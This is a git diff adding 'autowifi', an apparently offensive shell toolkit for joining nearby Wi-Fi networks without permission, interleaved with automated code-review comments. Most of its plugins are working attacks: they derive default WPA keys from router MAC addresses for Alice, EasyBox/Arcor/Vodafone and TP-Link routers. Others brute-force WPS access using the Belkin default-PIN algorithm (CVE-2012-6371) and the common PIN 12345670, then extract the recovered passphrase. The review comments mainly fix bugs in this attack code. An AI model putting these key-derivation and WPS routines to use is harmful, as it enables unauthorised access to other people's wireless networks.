Diffstat (limited to 'recon/autowifi/usr/lib')
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/core | 20 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/iwlist | 55 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/network | 40 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/openwrt | 18 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/plugin_core | 41 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant | 59 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wps | 84 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/opt/udhcpc.run | 70 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/00profile | 11 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/01open | 6 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02alice | 20 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02easybox | 37 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02tplink | 17 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps | 40 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/30default_wps | 18 |
15 files changed, 536 insertions, 0 deletions
diff --git a/recon/autowifi/usr/lib/autowifi/lib/core b/recon/autowifi/usr/lib/autowifi/lib/core
new file mode 100644
index 00000000..80ae75b4
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/core
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+exists() { type "$1" >/dev/null 2>/dev/null; }
+
+run_hooks(){
+ # (interface|profile) (pre|post)
+ typ=$1
+ action=$2
+ shift;shift
+ : ${interface?please provide interface}
+ if [ "$typ" = "interface" ];then
+ path=interface/$interface/$action
+ else
+ path=profile/$2/$action
+ fi
+ for hook in $(find "$root/etc/autowifi/hooks/$path" -type f 2>/dev/null | sort -u ); do
+ $hook "$@"
+ done
+}
+
diff --git a/recon/autowifi/usr/lib/autowifi/lib/iwlist b/recon/autowifi/usr/lib/autowifi/lib/iwlist
new file mode 100644
index 00000000..a9f77f0c
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/iwlist
@@ -0,0 +1,55 @@
+#!/bin/sh
+
+print_iwlist_env(){
+ # takes environment:
+ # count
+ # MAC
+ # CHANNEL
+ # QUALITY
+ # ENCRYPTION
+ # ESSID
+ # WPA
+ # WPA2
+ for i in ESSID MAC CHANNEL QUALITY ENCRYPTION WPA WPA2;do
+ eval echo ${i}_${count}=\$${i}
+ done
+}
+
+iwlist_scan(){
+ # usage: iwlist_scan $wifi-itf
+ ifconfig $wifi up
+
+ count=0
+
+ iwlist ${1:-} scan 2>/dev/null | ( while read line;
+ do
+ case "$line" in
+ *"Cell "*)
+ [ $count -eq 0 ] || print_iwlist_env
+ WPA=0
+ WPA2=0
+ : $((count+=1))
+ MAC="${line#*Address: }"
+ ;;
+ *Channel:*)
+ CHANNEL="${line#*:}"
+ ;;
+ *Quality=*)
+ QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`"
+ ;;
+ *"Encryption key:"*)
+ ENCRYPTION="${line#*key:}"
+ ;;
+ *ESSID:*)
+ ESSID="${line#*ESSID:}"
+ ;;
+ *"IE: IEEE 802.11i/WPA2"*)
+ WPA2=1
+ ;;
+ *"IE: WPA Version 1"*)
+ WPA=1
+ ;;
+ *);;
+ esac
+ done; print_iwlist_env ;echo WIFI_COUNT=$count)
+}
diff --git a/recon/autowifi/usr/lib/autowifi/lib/network b/recon/autowifi/usr/lib/autowifi/lib/network
new file mode 100644
index 00000000..a0105120
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/network 
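Review bot: `path=profile/$2/$action` is evaluated after `shift;shift`, so `$2` is the second hook argument rather than the profile name the `(interface|profile)` comment implies; capture it before shifting, e.g. `profile=$3` next to `typ=$1`, then `path=profile/$profile/$action`. `for hook in $(find …)` then runs every regular file under `$root/etc/autowifi/hooks/$path` as `$hook "$@"`, word-split and unquoted, without checking that it is executable or who owns it — for a tool that runs as root on hostile networks, `find … -type f -perm -u+x` plus `"$hook" "$@"` keeps a stray or planted file in the hooks directory from being executed by accident. A one-line comment on `run_hooks` stating that `$root` and `$interface` are expected from the environment would also help, since only the latter is asserted.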
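Review bot: `iwlist_scan` takes the interface as `$1` (`iwlist ${1:-} scan`) but brings it up with `ifconfig $wifi up`, a global that nothing in this file sets; use `ifconfig "$1" up` so both refer to the same device. The results are emitted as `NAME_N=value` shell assignments through `eval echo …` with `$ESSID` unescaped, and SSIDs are attacker-chosen beacon data — if the consumer sources or evals this output (the format suggests it; confirm), an SSID such as `";id;"` becomes command execution, so either quote-escape the value when printing or have the consumer parse the lines instead of evaluating them. `read line` without `-r` additionally mangles SSIDs containing backslashes; use `while IFS= read -r line`.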
@@ -0,0 +1,40 @@
+#!/bin/sh
+
+check_gateway(){
+ ping -c 1 -w 5 $(ip route | awk '/default/{print $3}') >/dev/null
+}
+check_internet(){
+ # TODO determine the loader, either wget or curl
+ secret=$(wget -O- http://krebsco.de/secret 2>/dev/null)
+ if [ "$secret" == "1337" ]; then
+ return 0
+ else
+ echo "cannot load secret or secret incorrect" >&2
+ return 1
+ fi
+}
+
+check_bandwidth(){
+ echo $(curl http://www.microsoft.com/africa/4afrika/images/infographic.gif -w "%{speed_download}" -o /dev/null 2>/dev/null | sed 's/\..*//')
+}
+
+ip_start(){
+ : ${interface?interface variable not set} ${1?please provide method to start ip}
+ # usage: method [extra parms]
+ case "$1" in
+ dhcp)
+ if exists dhcpcd; then
+ dhcpcd -x $interface
+ dhcpcd -w -A $interface
+ elif exists dhclient; then
+ dhclient -x $interface
+ dhclient $interface
+ elif exists udhcpc; then
+ PIDFILE=/var/run/udhcpc-${interface}.pid
+ [ -e $PIDFILE ] && kill `cat $PIDFILE` ||:
+ udhcpc -n -p $PIDFILE -i $interface -s \
+ "$root/usr/lib/autowifi/opt/udhcpc.run"
+ fi ;;
+ *) echo "do not know ip starter $1" >&2;;
+ esac
+}
diff --git a/recon/autowifi/usr/lib/autowifi/lib/openwrt b/recon/autowifi/usr/lib/autowifi/lib/openwrt
new file mode 100644
index 00000000..3483c1fe
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/openwrt
@@ -0,0 +1,18 @@
+#!/bin/sh
+connect_wifi(){
+ # channel ssid encryption key
+ uci set wireless.${iface}.mode=sta
+
+ ifconfig $wifi up
+ uci set wireless.${radio}.channel=$1
+ uci set "wireless.${iface}.ssid=$2"
+ if [ $3 == "none" ] ; then
+ uci set wireless.${iface}.encryption=none
+ uci -q delete wireless.${iface}.key
+ else
+ uci set "wireless.${iface}.key=$4"
+ uci set wireless.${iface}.encryption=$3
+ fi
+ uci commit wireless
+ wifi up
+}
diff --git a/recon/autowifi/usr/lib/autowifi/lib/plugin_core b/recon/autowifi/usr/lib/autowifi/lib/plugin_core
new file mode 100644
index 00000000..e79a3c05
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/plugin_core 
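Review bot: `[ "$secret" == "1337" ]` in `check_internet` uses `==`, which `dash`'s `[` rejects with "unexpected operator" under the `#!/bin/sh` shebang; write `[ "$secret" = "1337" ]`. The probe fetches `http://krebsco.de/secret` over plain HTTP and compares against a fixed string, which is fine as a reachability check, but any captive portal or on-path box can answer `1337` and have an untrusted network classified as "internet" — say so in the comment so nobody later treats the result as trustworthy. In `ip_start`, `kill \`cat $PIDFILE\`` signals whatever PID sits in `/var/run/udhcpc-${interface}.pid` without confirming it is still a udhcpc process, and the `udhcpc -n` exit status is never checked, so the caller cannot tell that no lease was obtained; at least `kill "$(cat "$PIDFILE")"` and `udhcpc … || return 1`.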
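Review bot: `if [ $3 == "none" ]` leaves `$3` unquoted, so an empty encryption argument makes `[` error out instead of taking the `else` branch, and `==` is not POSIX `test` syntax for a `#!/bin/sh` script; write `if [ "$3" = "none" ]; then`. `ifconfig $wifi up` reads `$wifi` while every other line reads `$iface`/`$radio`, none of which the function sets or asserts — a guard like the one `ip_start` uses, `: ${iface?} ${radio?}`, would fail loudly instead of silently writing `wireless..ssid`. `uci set "wireless.${iface}.key=$4"` followed by `uci commit wireless` persists the PSK into `/etc/config/wireless`; that is how OpenWrt works, but a comment noting that the key outlives the session is worth adding.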
@@ -0,0 +1,41 @@
+#!/bin/sh
+parse_plugin_args(){
+ [ $# -ne 4 ] && plugin_usage && exit 1
+ # convenience function to put args in ENV variables
+ ESSID="$1"
+
+ # mac is returned without colon
+ MAC=$(printf "%s" "$2" | sed 's/://g')
+ # split up the mac address to vendor and private part
+ VENDOR_MAC=${MAC:0:6}
+ PRIVATE_MAC=${MAC:6:12}
+ CHANNEL="$3"
+ ENC="$4"
+ if [ ${#MAC} -ne 12 ] ;then
+ echo "MAC malformed"
+ exit 1
+ fi
+}
+plugin_usage(){
+ cat << EOF
+usage: $0 ESSID MAC CHANNEL ENC"
+
+ ESSID - string
+ MAC - 00:11:22:33:44:55
+ CHANNEL - 4
+ ENC - wpa
+EOF
+
+}
+
+check_vendor_mac(){
+ needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+ shift
+ for i in "$@";do
+ [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+ done
+ return 1
+}
+check_painmode(){
+ test -z "${painmode:-}" && echo "painmode required" && exit 1
+}
diff --git a/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant
new file mode 100644
index 00000000..df9c2155
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant 
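Review bot: `VENDOR_MAC=${MAC:0:6}` and `PRIVATE_MAC=${MAC:6:12}` are bash substring expansions that `dash` aborts on with "Bad substitution", so under the `#!/bin/sh` shebang `parse_plugin_args` — and every plugin that sources it — only works when `/bin/sh` happens to be bash; use `VENDOR_MAC=$(printf '%s' "$MAC" | cut -c1-6)` and `cut -c7-12`, or change the shebang. `check_vendor_mac` passes the caller's MAC as the `printf` format string (`printf $1`), so a `%` in a malformed BSSID is interpreted; `printf '%s' "$1"` is the safe form, and `==` there should be `=` for the same portability reason. The length check only verifies 12 characters, not that they are hex; a `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed"; exit 1;; esac` would reject garbage before plugins feed it into `$((0x$MAC …))`.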
@@ -0,0 +1,59 @@
+#!/bin/sh
+start_wpa_supplicant(){
+ wpa_conf=${1?please supply wpa_supplicant.conf path}
+ killall wpa_supplicant
+ sleep 1
+cat>$wpa_conf<<EOF
+ctrl_interface=/var/run/wpa_supplicant
+EOF
+ wpa_supplicant -i $interface -c $wpa_conf -B
+ sleep 4
+}
+connect_wifi(){
+ # bssid ssid encryption-string key
+
+ wpa_cli reconfigure
+
+ int=$(wpa_cli add_network | tail -1)
+ wpa_cli set_network $int ssid \"$2\"
+ wpa_cli set_network $int bssid $1
+ #wpa_cli set_network $int ap_scan 1
+
+ if [ "$3" = "[ESS]" ]; then
+ wpa_cli set_network $int key_mgmt NONE
+ else
+ wpa_cli set_network $int key_mgmt WPA-PSK
+ wpa_cli set_network $int psk \"$4\"
+ fi
+ wpa_cli enable_network $int
+}
+
+wifi_scan(){
+ # usage: iwlist_scan $wifi-itf
+
+ count=0
+ wpa_cli scan >/dev/null
+ sleep 10
+
+ wpa_cli scan_results 2>/dev/null | egrep "^..:" | sed 's/ / /g' | (while IFS=' ' read MAC FREQ QUALITY ENCRYPTION ESSID
+ do
+ : $((count+=1))
+ print_wifi_env
+
+ done; echo WIFI_COUNT=$count)
+}
+
+print_wifi_env(){
+ # takes environment:
+ # MAC
+ # FREQ
+ # QUALITY
+ # ENCRYPTION
+ # ESSID
+ for i in MAC FREQ QUALITY ENCRYPTION ESSID;do
+ eval echo ${i}_${count}=\\\"\$"${i}"\\\"
+ done
+}
+wpa_supplicant_is_usable(){
+ wpa_cli status >/dev/null 2>&1
+}
diff --git a/recon/autowifi/usr/lib/autowifi/lib/wps b/recon/autowifi/usr/lib/autowifi/lib/wps
new file mode 100644
index 00000000..5e9bbda7
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/lib/wps 
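Review bot: `wpa_cli set_network $int ssid \"$2\"` word-splits `$2`, so an SSID with a space (`Free WiFi`) reaches wpa_cli as two arguments and the surrounding quotes end up in the wrong places; pass `"\"$2\""`, and likewise `"\"$4\""` for the psk. The PSK is also handed to `wpa_cli` on its command line, visible in `ps` to every local user while the call runs — where that matters, generate a config with `umask 077` instead. `int=$(wpa_cli add_network | tail -1)` is never checked for `FAIL`, so after a failed add every following `set_network FAIL …` silently fails, and `killall wpa_supplicant` in `start_wpa_supplicant` terminates every instance on the host rather than the one on `$interface`. `print_wifi_env` prints `NAME_N="value"` with `$ESSID` unescaped, so an SSID containing `"` breaks out of the quoting if the consumer evals these lines (hedged — the consumer is not in this diff).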
@@ -0,0 +1,84 @@
+#!/bin/sh
+has_wps(){
+ # the-wpa_supplicant-encryption-string
+ echo "$1" | grep -q "\[WPS\]"
+}
+try_wps_pin(){
+ #
+ # ESSID MAC CHANNEL ENC WPA WPA2 PIN
+ #set -ef
+ ESSID="$1"
+ MAC="$2"
+ CHANNEL="$3"
+
+ # TODO refactor to use all the encryption
+ # the wpa_supplicant encryption string
+ ENC="$4"
+
+ PIN="$5"
+
+ [ "$ENC" == "[ESS]" ] && return 2
+ WPA_CONF=/tmp/wpa_trywps.conf
+ WPA_LOG=/tmp/wpa_trywps.log
+ rm $WPA_LOG
+ #mkfifo $WPA_LOG
+ killall wpa_supplicant 2>/dev/null && sleep 1
+
+ cat > $WPA_CONF <<EOF
+ctrl_interface=/var/run/wpa_supplicant
+ctrl_interface_group=0
+update_config=1
+EOF
+ wpa_supplicant -Dwext -iwlan0 -c $WPA_CONF -f $WPA_LOG 2>&1 &
+ WPA_PID=$!
+ sleep 2
+ if !(sudo wpa_cli wps_reg $MAC $PIN | grep -q OK) ;then
+ echo "wpa_cli wps_reg failed, bailing out!"
+ return 1
+ fi
+
+ # association failed
+ # exit 1 ;;
+ # TODO probably not posix compatible...
+ timeout(){
+ ( timeout=10;
+ while [ $timeout -gt 0 ]; do
+ sleep 1;
+ kill -0 $$ 2> /dev/null || exit 0;
+ : $((timeout--));
+ done ;
+ echo "TIMEOUT REACHED" ;
+ kill $$)&
+ exec $@
+ }
+
+ if ( timeout tail -f $WPA_LOG & echo "TAILPID: $!") | while read line ; do
+ bye(){
+ printf "%s:" "$2" >&2
+ kill $WPA_PID
+ kill -HUP $TAILPID
+ exit $1
+ }
+ # DEBUG
+ #echo $line >&2
+ case "$line" in
+ TAILPID:*)IFS=" " set -- $line; TAILPID=$2;;
+ *"WPS-FAIL msg=10 config_error=18"*) bye 1 "wrong pin";;
+ *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1 "rate limiting";;
+ #*"Association request to the driver failed") bye 1 "wps not available";;
+ #*CTRL-EVENT-DISCONNECTED*):;;
+ *"CTRL-EVENT-DISCONNECTED bssid="*"reason=3 locally_generated=1"*)bye 1 "authentication failed, wps deactivated?";;
+ "TIMEOUT REACHED")bye 1 "timeout reached";;
+ *CTRL-EVENT-TERMINATING*) bye 1 "wpa_supplicant died";;
+ *CTRL-EVENT-CONNECTED*) bye 0 "yay connected";;
+ esac
+ done ; then
+ #echo "Connected!" 
+ sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' "$WPA_CONF"
+ return 0
+ else
+ #echo "failed!"
+ return 1
+ fi
+
+}
diff --git a/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run
new file mode 100755
index 00000000..2e1b919f
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run
@@ -0,0 +1,70 @@
+#!/bin/sh
+# shamelessly stolen from http://www.doit.org/udhcpc/S50default
+
+PATH=/bin:/usr/bin:/sbin:/usr/sbin
+
+RESOLV_CONF="/etc/resolv.conf"
+
+update_interface()
+{
+ [ -n "$broadcast" ] && BROADCAST="broadcast $broadcast"
+ [ -n "$subnet" ] && NETMASK="netmask $subnet"
+ ifconfig $interface $ip $BROADCAST $NETMASK
+}
+
+update_routes()
+{
+ if [ -n "$router" ]
+ then
+ echo "deleting routes"
+ while route del default gw 0.0.0.0 dev $interface
+ do :
+ done
+
+ for i in $router
+ do
+ route add default gw $i dev $interface
+ done
+ fi
+}
+
+update_dns()
+{
+ echo -n > $RESOLV_CONF
+ [ -n "$domain" ] && echo domain $domain >> $RESOLV_CONF
+ for i in $dns
+ do
+ echo adding dns $i
+ echo nameserver $i >> $RESOLV_CONF
+ done
+}
+
+deconfig()
+{
+ ifconfig $interface 0.0.0.0
+}
+
+case "$1" in
+ bound)
+ update_interface;
+ update_routes;
+ update_dns;
+ ;;
+
+ renew)
+ update_interface;
+ update_routes;
+ update_dns;
+ ;;
+
+ deconfig)
+ deconfig;
+ ;;
+
+ *)
+ echo "Usage: $0 {bound|renew|deconfig}"
+ exit 1
+ ;;
+esac
+
+exit 0
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/00profile b/recon/autowifi/usr/lib/autowifi/plugins/00profile
new file mode 100755
index 00000000..d7fb9c75
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/00profile
@@ -0,0 +1,11 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+# ENV:
+# root (default: /)
+root=${root:-/}
+cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do
+ if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then
+ echo $KEY
+ exit 0
+ fi
+done; exit 1) 
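Review bot: `WPA_CONF=/tmp/wpa_trywps.conf` and `WPA_LOG=/tmp/wpa_trywps.log` are fixed names in a world-writable directory written with plain redirections, so another local user can pre-create or symlink them, and because the config carries `update_config=1` wpa_supplicant writes the recovered PSK back into that file with default permissions before `sed` extracts it. Create both with `mktemp` under `umask 077` (`WPA_CONF=$(mktemp /tmp/wpa_trywps.XXXXXX)`) and delete them in `bye`; `rm $WPA_LOG` also lacks `-f`, so the first run prints a spurious error. `wpa_supplicant -Dwext -iwlan0` hard-codes driver and interface while the rest of the library uses `$interface`, and `sudo wpa_cli wps_reg $MAC $PIN` is the only `sudo` in the diff although wpa_supplicant itself was started unprivileged — either the whole function needs root or none of it does. `exec $@` in the nested `timeout` should be `exec "$@"`.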
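Review bot: `update_dns` truncates `/etc/resolv.conf` with `echo -n > $RESOLV_CONF` and appends `$domain` and every `$dns` value verbatim, all supplied by the DHCP server of a network this tool joins precisely because it is untrusted; the previous resolver configuration is lost with no backup and nothing checks the values look like an address. Write to a temp file and `mv` it into place, validate each `$i` with a `case` pattern (`*[!0-9.]*` for IPv4) before `echo nameserver $i`, and keep a copy of the original so `deconfig` can restore it. `: > "$RESOLV_CONF"` is the idiomatic truncate, and the unquoted `$interface $ip $BROADCAST $NETMASK` in `update_interface` should be quoted like the rest of the DHCP-derived values.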
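Review bot: `echo $KEY` prints the matched key unquoted, so a passphrase containing spaces, tabs or glob characters (`*`) is reflowed or expanded before the caller sees it, and `read` without `-r` drops backslashes from keys; use `while IFS='|' read -r SSID MAC BANDWIDTH KEY` and `printf '%s\n' "$KEY"`. `[ "$1" == "$SSID" -a "$2" == "$MAC" ]` combines the non-POSIX `==` with the deprecated `-a`; `[ "$1" = "$SSID" ] && [ "$2" = "$MAC" ]` is portable under `#!/bin/sh`. `wifi_keys` holds plaintext PSKs, so a header comment documenting the `ssid|mac|bandwidth|key` line format and that the file should be mode 0600 would help whoever creates it.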
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/01open b/recon/autowifi/usr/lib/autowifi/plugins/01open
new file mode 100755
index 00000000..881f47ea
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/01open
@@ -0,0 +1,6 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION
+if [ "$4" == "[ESS]" ]; then
+ exit 0
+fi
+exit 1
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02alice b/recon/autowifi/usr/lib/autowifi/plugins/02alice
new file mode 100755
index 00000000..1b4533a4
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/02alice
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02easybox b/recon/autowifi/usr/lib/autowifi/plugins/02easybox
new file mode 100755
index 00000000..3d7cb8c1
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/02easybox 
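Review bot: `[ "$4" == "[ESS]" ]` compares the whole flag string for equality, so an open network that also advertises WPS (wpa_cli prints `[WPS][ESS]` for those — confirm against the scan format feeding this) is reported as not open, and `==` is not POSIX `test` syntax for `#!/bin/sh`. A `case "$4" in *"[WPA"*|*"[WEP"*) exit 1;; *"[ESS]"*) exit 0;; esac` keyed on the presence of a security flag would be more robust than exact equality.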
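Review bot: `${TMP:0:12}` is a bash substring expansion, so this `#!/bin/sh` script only runs when `/bin/sh` is bash and aborts with "Bad substitution" under `dash`; `printf '%s' "$TMP" | cut -c1-12 | base64` is portable. `printf $ETHMAC | md5sum` and `printf ${TMP:0:12}` both use data as the `printf` format string — the values are hex here, but `printf '%s' "$ETHMAC"` is the habit that keeps a `%` in scan-derived data from being interpreted. `cd $(dirname $(readlink -f $0))` is unquoted, so an install path containing a space breaks the `. ../lib/plugin_core` that follows.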
@@ -0,0 +1,37 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+parse_plugin_args "$@"
+
+if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then
+ echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
+ exit 1
+else
+
+ # Fill up to 4 places with zeros, if necessary:
+ deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
+ #
+ # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
+ hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
+ #echo 'M4 (Hex): ' ${hexi[@]}
+ # K1 = last byte of (d0 + d1 + h2 + h3)
+ # K2 = last byte of (h0 + h1 + d2 + d3)
+ c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
+ c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
+ K1=$((($c1)%16))
+ K2=$((($c2)%16))
+ #printf "K1: %x\n" $K1
+ #printf "K2: %x\n" $K2
+ X1=$((K1^${deci:6:1}))
+ X2=$((K1^${deci:4:1}))
+ X3=$((K1^${deci:2:1}))
+ Y1=$((K2^0x${hexi:2:1}))
+ Y2=$((K2^0x${hexi:4:1}))
+ Y3=$((K2^0x${hexi:6:1}))
+ Z1=$((0x${hexi:4:1}^${deci:6:1}))
+ Z2=$((0x${hexi:6:1}^${deci:4:1}))
+ Z3=$((K1^K2))
+ printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
+fi
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02tplink b/recon/autowifi/usr/lib/autowifi/plugins/02tplink
new file mode 100755
index 00000000..b2b96f95
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/02tplink 
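Review bot: unlike `02alice` and `02tplink`, this plugin never checks the vendor OUI — any network whose ESSID merely contains `EasyBox-`, `Arcor-` or `Vodafone-` (case-insensitive, unanchored) gets a candidate key derived from its MAC, so it emits keys for unrelated networks and burns an association attempt on each; anchor the match (`egrep -i '^(EasyBox-|Arcor-|Vodafone-)'`) and add a `check_vendor_mac` call if the affected OUIs are known. `${MAC:8:4}`, `${deci:0:1}` and the other substring expansions are bash-only under the `#!/bin/sh` shebang, as in `plugin_core`. The `Essid … is not Default` diagnostic is written to stdout, which is where callers read the key from; send it to `>&2`.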
@@ -0,0 +1,17 @@
+#!/bin/sh
+# Implementation of TP-Link default WPA Key
+# Based on
+# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1
+! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1
+
+
+# printf always makes string to lower, need that for correct md5sum
+printf ${MAC:4:12}
+exit 0
diff --git a/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..d4eb8e37
--- /dev/null
+++ b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,40 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+. ../lib/wps
+parse_plugin_args "$@"
+
+check_painmode
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
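Review bot: the comment `# printf always makes string to lower, need that for correct md5sum` is copied from `02alice` and does not apply here — nothing is hashed, and `printf ${MAC:4:12}` does not change case, it prints the last eight MAC digits exactly as received (so the case of the emitted key depends on the scan output; confirm which case the router expects). `printf ${MAC:4:12}` also uses data as the format string and relies on a bash substring expansion under `#!/bin/sh`; `printf '%s' "$MAC" | cut -c5-12` is portable. `echo $ESSID | egrep -q '^tp'` is case-sensitive — if the targeted default SSIDs are of the form `TP-LINK_…` this never matches; add `-i` or document the expected form in the header.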
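Review bot: `try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})` leaves `$@` unquoted, so an ESSID containing a space shifts every positional parameter and the computed PIN lands in the wrong slot — `30default_wps` uses `"$@"` for the same call; do the same here. The third OUI, `09863B` (`09:86:3B` in the comment), has the group bit set in its first octet, which cannot occur in a unicast BSSID; Belkin's registered OUI is `08:86:3B`, so this looks like a typo that makes the F9K1104 entry unreachable — verify before changing it. `calc_belkin` also overwrites the global `PRIVATE_MAC` set by `parse_plugin_args` with its own `$1`; harmless as called, but a distinct local name such as `priv=$1` avoids the surprise.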
@@ -0,0 +1,18 @@
+#!/bin/sh
+# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot
+# http://www.wotan.cc/?p=75
+cd $(dirname $(readlink -f $0))
+. ../lib/wps
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+check_painmode
+DEFAULT_PIN="${DEFAULT_PIN:-12345670}"
+
+if has_wps "$ENC"; then
+ echo "trying PIN $DEFAULT_PIN against $ESSID" >&2
+ try_wps_pin "$@" $DEFAULT_PIN
+else
+ echo "Network $ESSID not WPS enabled"
+ exit 1
+fi |
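Review bot: `echo "Network $ESSID not WPS enabled"` goes to stdout, which in this plugin interface is where the key is returned, while the `trying PIN …` line three lines above correctly uses `>&2`; redirect it the same way. `try_wps_pin "$@" $DEFAULT_PIN` passes `$DEFAULT_PIN` unquoted even though it is operator-controlled via the environment; quote it for consistency with `"$@"`. A short header comment stating the contract — arguments `ESSID MAC CHANNEL ENC`, key on stdout with exit 0, and that `painmode` is required because this plugin actively associates with the target — would document what `check_painmode` is guarding.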